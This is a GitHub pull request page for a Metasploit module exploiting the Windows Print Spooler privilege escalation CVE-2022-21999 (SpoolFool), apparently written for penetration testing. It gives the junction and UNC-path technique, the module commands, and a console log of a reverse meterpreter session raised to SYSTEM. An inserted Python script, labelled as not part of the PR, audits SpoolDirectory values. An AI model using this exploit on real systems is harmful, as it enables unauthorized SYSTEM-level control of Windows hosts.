
Add module for CVE-2022-21999 and More Railgun Definitions #16344

Merged
merged 14 commits into from
Mar 16, 2022

Conversation

space-r7
Contributor

@space-r7 space-r7 commented Mar 14, 2022

Description

The Windows Print Spooler has a privilege escalation vulnerability that can be leveraged to achieve code execution as SYSTEM.

The SpoolDirectory, a configuration setting that holds the path that a printer's spooled jobs are sent to, is writable for all users, and it can be configured via SetPrinterDataEx() provided the caller has the PRINTER_ACCESS_ADMINISTER permission. If the SpoolDirectory path does not exist, it will be created once the print spooler reinitializes.

Calling SetPrinterDataEx() with the CopyFiles\ registry key will load the dll passed in as the pData argument, meaning that writing a dll to the SpoolDirectory location can be loaded by the print spooler.

Using a directory junction and UNC path for the SpoolDirectory, the exploit writes a payload to C:\Windows\System32\spool\drivers\x64\4 and loads it by calling SetPrinterDataEx(), resulting in code execution as SYSTEM.

Verification

  • Get a meterpreter session on the target
  • Do: use exploit/windows/local/cve_2022_21999_spoolfool_privesc
  • Do: set SESSION <sess_no>
  • Do: set LHOST <lhost>
  • Do: set LPORT <port_no>
  • Do: run
  • You should get a meterpreter session with SYSTEM privileges.

Notes

  • This exploit can succeed a max of two times since the Print Spooler will not automatically restart after two crashes. This could be fixed with a reboot, but I decided not to add that in since that's pretty invasive.

  • Windows 7 and Windows Server 2016 are also technically vulnerable, but not supported by this module. Windows 7 does not appear to have the AppVTerminator.dll that's used to force a crash in the Print Spooler, so the only other option would be rebooting, which I didn't add for the reason mentioned above. The one version of 2016 I tested only allowed administrators to open an existing printer / add a new one.

  • Getting a session literally takes minutes, and I haven't figured out a way to shorten that. The "Sending stage.." message is pretty immediate, but getting an actual meterpreter prompt takes minutes.

  • This exploit does not use all of the definitions, constants, etc. added, but I figured they may be useful to add in now for potential modules later down the line.

Scenarios

Windows 10 21H2 (Build 19044.1288)

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.98.1:4444
[*] Sending stage (200262 bytes) to 172.16.98.146
[*] Meterpreter session 1 opened (172.16.98.1:4444 -> 172.16.98.146:49674 ) at 2022-03-14 09:02:21 -0500

meterpreter > getuid
Server username: DESKTOP-49N0D8H\shelbypace
meterpreter > sysinfo
Computer        : DESKTOP-49N0D8H
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2022_21999_spoolfool_privesc
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > set lhost 172.16.98.1
lhost => 172.16.98.1
msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > set session 1
session => 1
msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > run

[*] Started reverse TCP handler on 172.16.98.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Making base directory: C:\Users\shelbypace\AppData\Local\Temp\sYOsQqHLPd
[+] Printer DZBUma was successfully added.
[*] Setting spool directory: \\localhost\C$\Users\shelbypace\AppData\Local\Temp\sYOsQqHLPd\4
[*] Creating junction point: C:\Users\shelbypace\AppData\Local\Temp\sYOsQqHLPd -> C:\Windows\System32\spool\drivers\x64
[*] Creating the spool directory by restarting spooler...
[*] Attempting to restart print spooler.
[*] Sleeping for 5 seconds.
[+] Directory was successfully created.
[*] Writing payload to C:\Windows\System32\spool\drivers\x64\4\tqDNFaf.dll.
[*] Attempting to set permissions for payload.
[*] Payload should have read / execute permissions now.
[*] Sending stage (200262 bytes) to 172.16.98.146
[*] Meterpreter session 2 opened (172.16.98.1:4444 -> 172.16.98.146:49677 ) at 2022-03-14 09:08:36 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-49N0D8H
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

Co-authored-by: Brendan <bwatters@rapid7.com>
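The description above gives a defender a concrete thing to audit: a printer whose SpoolDirectory has been redirected to a UNC path, an administrative share or a user-writable location. The following audit helper is an added example and is not part of this PR or the Metasploit module; the printer inventory is constructed (the last entry reuses the SpoolDirectory shown in the scenario output), the system drive is assumed to be C:, and only string-level checks are performed since resolving junctions requires the live host.

```python
"""Audit printer SpoolDirectory values for the traits described in the PR.

Added example, not code from this PR or the Metasploit module. Printer
records are constructed; on a live host they would be read from the
SpoolDirectory value under
HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Printers\\<name>.
"""
import ntpath

# Stock locations; assumes the system drive is C: (labelled assumption).
DEFAULT_SPOOL = r"C:\Windows\System32\spool\PRINTERS"
USER_PROFILES = r"C:\Users"


def assess_spool_directory(value):
    """Return the findings for one SpoolDirectory value (empty list = benign)."""
    findings = []
    if not value:
        return findings              # unset means the default directory is used
    path = ntpath.normpath(value)
    if ntpath.normcase(path) != ntpath.normcase(DEFAULT_SPOOL):
        findings.append("non-default")
    drive, rest = ntpath.splitdrive(path)
    if drive.startswith("\\\\"):
        findings.append("unc-path")  # the PR's scenario uses \\localhost\C$\...
        share = drive.split("\\")[3]
        if len(share) == 2 and share.endswith("$"):
            findings.append("admin-share")
            path = share[0] + ":" + rest   # map \\host\C$\x back to C:\x
    if ntpath.normcase(path).startswith(ntpath.normcase(USER_PROFILES) + "\\"):
        findings.append("user-profile-location")  # writable by a low-privileged user
    return findings


def audit_printers(printers):
    """Map printer name -> findings for every printer whose value is not benign."""
    flagged = {}
    for name, value in printers.items():
        findings = assess_spool_directory(value)
        if findings:
            flagged[name] = findings
    return flagged


# Constructed inventory; the last entry is the value from the PR's scenario output.
PRINTERS = {
    "Office-Laser": "",
    "Legacy-HP": r"C:\Windows\System32\spool\PRINTERS",
    "DZBUma": r"\\localhost\C$\Users\shelbypace\AppData\Local\Temp\sYOsQqHLPd\4",
}

if __name__ == "__main__":
    for name, findings in audit_printers(PRINTERS).items():
        print(f"{name}: {', '.join(findings)}")
```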
@bwatters-r7 bwatters-r7 merged commit b4de9fa into rapid7:master Mar 16, 2022
@bwatters-r7
Contributor

bwatters-r7 commented Mar 16, 2022

Release Notes

This PR adds a module targeting SpoolFool (AKA CVE-2022-21999), a local privilege escalation targeting the spool service on Windows 10 or Server builds 18362 or earlier.

@space-r7 space-r7 deleted the spoolfool-module branch March 16, 2022 13:45
@space-r7 space-r7 added the rn-modules release notes for new or majorly enhanced modules label Mar 16, 2022
Labels
docs library module rn-modules release notes for new or majorly enhanced modules